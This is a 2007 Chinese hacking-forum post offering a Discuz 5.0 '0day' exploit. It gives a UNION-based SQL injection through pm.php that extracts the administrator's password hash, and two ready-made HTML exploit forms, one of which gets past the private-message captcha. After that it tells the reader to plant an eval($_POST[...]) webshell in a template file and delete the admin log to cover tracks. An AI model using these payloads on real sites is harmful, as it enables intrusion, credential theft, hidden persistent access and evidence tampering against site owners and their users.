Discuz 5.0 0day + PM短信饶过方法--Discuz,0day,PM短信,饶过方法

作者：佚名来源：网上收集发布时间：2007-4-9 21:10:28

SQL:
0) union select password,2,0 from cdb_members where uid=1/*
uid=1/* 1
就是ID值

获得管理员md5密码后
进后台
论坛管理模块编辑详情
修改wap.php插入
eval($_POST[tlwbw])
连接地址
网站地址+/templates/default/wap.lang.php

哈哈进过后台别忘了清掉forumdata/cplog.php

利用代码保存为 .html

以下是引用片段：
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>BODY {
SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3
}
TABLE {
BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse
}
.tr {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center
}
.td {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
.warningColor {
FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New"
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
A:link {
FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none
}
TR {
FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New"
}
TD {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"
}
.trHead {
FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3
}
.inputLogin {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
</STYLE>

<SCRIPT language=JavaScript>

</SCRIPT>

<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method=post>
<TBODY>
<TR>
<TD class=td height=22> Dz5.0 Exp</TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td height=18>  Url: <INPUT id=theAction
onblur='this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"'
size=50 value=http://www.4evil.org name=theAction><BR><INPUT
id=the2Action type=hidden name=the2Action> Hash: <INPUT
value=0094b488 name=formhash>   Msgto:<INPUT size=10
value=aspxp name=msgto><BR><INPUT type=hidden size=10 value=aa
name=subject><INPUT type=hidden value=aa name=message>  SQL:
<INPUT size=100
value="0) union select password,2,0 from cdb_members where uid=1/*"
name=msgtobuddys[]></TD></TR>
<TR>
<TD class=td align=middle><INPUT onclick=this.form.action=this.form.the2Action.value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td align=right height=22>Just For Fun <A title=QQ:****
href="http://www.****.org">****</A>
2007.3 </TD></TR></FORM></TBODY></TABLE></BODY></HTML>

PM漏洞过短信验证的方法：（来源7贱的BLOG）

<HTML><HEAD><TITLE>discuz</TITLE>
<BODY>
<a href="http://1v1.name">http://1v1.name</a><FORM name=frm method=post target=_blank>Url: <INPUT
size=45 name=act> <INPUT
size=8 name=formhash> <INPUT type=button value="提交" name=Send><br><br>
MySQL:<INPUT
size=65 value='0) union select password,2,0 from cdb_members where uid=1/*'name=msgtobuddys[]>
<input type="text" name="seccodeverify" size="7">
<INPUT TYPE="hidden" NAME="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>